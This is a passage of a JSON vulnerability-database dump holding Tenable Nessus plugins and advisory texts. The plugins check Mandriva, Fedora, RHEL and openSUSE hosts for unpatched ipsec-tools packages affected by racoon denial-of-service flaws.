script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:flex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64ipsec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64ipsec0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libipsec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libipsec0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"flex-2.5.33-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"ipsec-tools-0.7.2-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64ipsec-devel-0.7.2-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64ipsec0-0.7.2-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libipsec-devel-0.7.2-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libipsec0-0.7.2-0.1mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T07:17:12", "bulletinFamily": "scanner", "description": "Minor version update from upstream fixing remote DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-04-02T00:00:00", "id": "FEDORA_2009-4291.NASL", "href": "https://www.tenable.com/plugins/nessus/38809", "published": "2009-05-19T00:00:00", "title": "Fedora 9 : ipsec-tools-0.7.2-1.fc9 (2009-4291)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-4291.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38809);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:29\");\n\n script_cve_id(\"CVE-2009-1574\");\n script_bugtraq_id(30657, 34765);\n script_xref(name:\"FEDORA\", value:\"2009-4291\");\n\n script_name(english:\"Fedora 9 : ipsec-tools-0.7.2-1.fc9 (2009-4291)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Minor version update from upstream fixing remote DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=497990\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/023626.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ce1f6f04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ipsec-tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"ipsec-tools-0.7.2-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ipsec-tools\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T07:17:12", "bulletinFamily": "scanner", "description": "Minor version update from upstream fixing remote DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-04-02T00:00:00", "id": "FEDORA_2009-4394.NASL", "href": "https://www.tenable.com/plugins/nessus/38811", "published": "2009-05-19T00:00:00", "title": "Fedora 11 : ipsec-tools-0.7.2-1.fc11 (2009-4394)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-4394.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38811);\n script_version (\"1.10\");\n script_cvs_date(\"Date: 2019/08/02 13:32:29\");\n\n script_cve_id(\"CVE-2009-1574\");\n script_xref(name:\"FEDORA\", value:\"2009-4394\");\n\n script_name(english:\"Fedora 11 : ipsec-tools-0.7.2-1.fc11 (2009-4394)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Minor version update from upstream fixing remote DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=497990\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/023690.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?99e62bed\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ipsec-tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"ipsec-tools-0.7.2-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ipsec-tools\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T07:17:12", "bulletinFamily": "scanner", "description": "Minor version update from upstream fixing remote DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-04-02T00:00:00", "id": "FEDORA_2009-4298.NASL", "href": "https://www.tenable.com/plugins/nessus/38810", "published": "2009-05-19T00:00:00", "title": "Fedora 10 : ipsec-tools-0.7.2-1.fc10 (2009-4298)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-4298.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38810);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2019/08/02 13:32:29\");\n\n script_cve_id(\"CVE-2009-1574\");\n script_bugtraq_id(34765);\n script_xref(name:\"FEDORA\", value:\"2009-4298\");\n\n script_name(english:\"Fedora 10 : ipsec-tools-0.7.2-1.fc10 (2009-4298)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Minor version update from upstream fixing remote DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=497990\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-May/023647.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?11ee615f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ipsec-tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"ipsec-tools-0.7.2-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ipsec-tools\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T02:12:35", "bulletinFamily": "scanner", "description": "An updated ipsec-tools package that fixes multiple security issues is\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe ipsec-tools package is used in conjunction with the IPsec\nfunctionality in the Linux kernel and includes racoon, an IKEv1 keying\ndaemon.\n\nA denial of service flaw was found in the ipsec-tools racoon daemon.\nAn unauthenticated, remote attacker could trigger a NULL pointer\ndereference that could cause the racoon daemon to crash.\n(CVE-2009-1574)\n\nMultiple memory leak flaws were found in the ipsec-tools racoon\ndaemon. If a remote attacker is able to make multiple connection\nattempts to the racoon daemon, it was possible to cause the racoon\ndaemon to consume all available memory. (CVE-2009-1632)\n\nUsers of ipsec-tools should upgrade to this updated package, which\ncontains backported patches to correct these issues. Users must\nrestart the racoon daemon for this update to take effect.", "modified": "2020-04-02T00:00:00", "id": "REDHAT-RHSA-2009-1036.NASL", "href": "https://www.tenable.com/plugins/nessus/38819", "published": "2009-05-19T00:00:00", "title": "RHEL 5 : ipsec-tools (RHSA-2009:1036)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1036. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38819);\n script_version (\"1.27\");\n script_cvs_date(\"Date: 2019/10/25 13:36:14\");\n\n script_cve_id(\"CVE-2009-1574\", \"CVE-2009-1632\");\n script_bugtraq_id(34765);\n script_xref(name:\"RHSA\", value:\"2009:1036\");\n\n script_name(english:\"RHEL 5 : ipsec-tools (RHSA-2009:1036)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated ipsec-tools package that fixes multiple security issues is\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe ipsec-tools package is used in conjunction with the IPsec\nfunctionality in the Linux kernel and includes racoon, an IKEv1 keying\ndaemon.\n\nA denial of service flaw was found in the ipsec-tools racoon daemon.\nAn unauthenticated, remote attacker could trigger a NULL pointer\ndereference that could cause the racoon daemon to crash.\n(CVE-2009-1574)\n\nMultiple memory leak flaws were found in the ipsec-tools racoon\ndaemon. If a remote attacker is able to make multiple connection\nattempts to the racoon daemon, it was possible to cause the racoon\ndaemon to consume all available memory. (CVE-2009-1632)\n\nUsers of ipsec-tools should upgrade to this updated package, which\ncontains backported patches to correct these issues. Users must\nrestart the racoon daemon for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1574\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1632\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1036\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ipsec-tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1036\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ipsec-tools-0.6.5-13.el5_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ipsec-tools-0.6.5-13.el5_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ipsec-tools-0.6.5-13.el5_3.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ipsec-tools\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T02:44:01", "bulletinFamily": "scanner", "description": "This update of ipsec-tools fixes a crash of racoon in ISAKMP", "modified": "2020-04-02T00:00:00", "id": "SUSE_11_0_NOVELL-IPSEC-TOOLS-090616.NASL", "href": "https://www.tenable.com/plugins/nessus/40081", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : novell-ipsec-tools (novell-ipsec-tools-1007)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update novell-ipsec-tools-1007.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40081);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/10/25 13:36:34\");\n\n script_cve_id(\"CVE-2009-1574\", \"CVE-2009-1632\");\n\n script_name(english:\"openSUSE Security Update : novell-ipsec-tools (novell-ipsec-tools-1007)\");\n script_summary(english:\"Check for the novell-ipsec-tools-1007 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of ipsec-tools fixes a crash of racoon in ISAKMP's\nde-fragmentation code due to a NULL pointer dereference.\n(CVE-2009-1574) Additionally multiple memory leaks were fixed that\nallowed to execute a remote denial of service attack. (CVE-2009-1632)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=498859\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=504186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=506710\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected novell-ipsec-tools packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:novell-ipsec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:novell-ipsec-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"novell-ipsec-tools-0.6.3-183.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"novell-ipsec-tools-devel-0.6.3-183.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"novell-ipsec-tools\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T03:21:46", "bulletinFamily": "scanner", "description": "It was discovered that ipsec-tools did not properly handle certain\nfragmented packets. A remote attacker could send specially crafted\npackets to the server and cause a denial of service. (CVE-2009-1574)\n\nIt was discovered that ipsec-tools did not properly handle memory\nusage when verifying certificate signatures or processing\nnat-traversal keep-alive messages. A remote attacker could send\nspecially crafted packets to the server and exhaust available memory,\nleading to 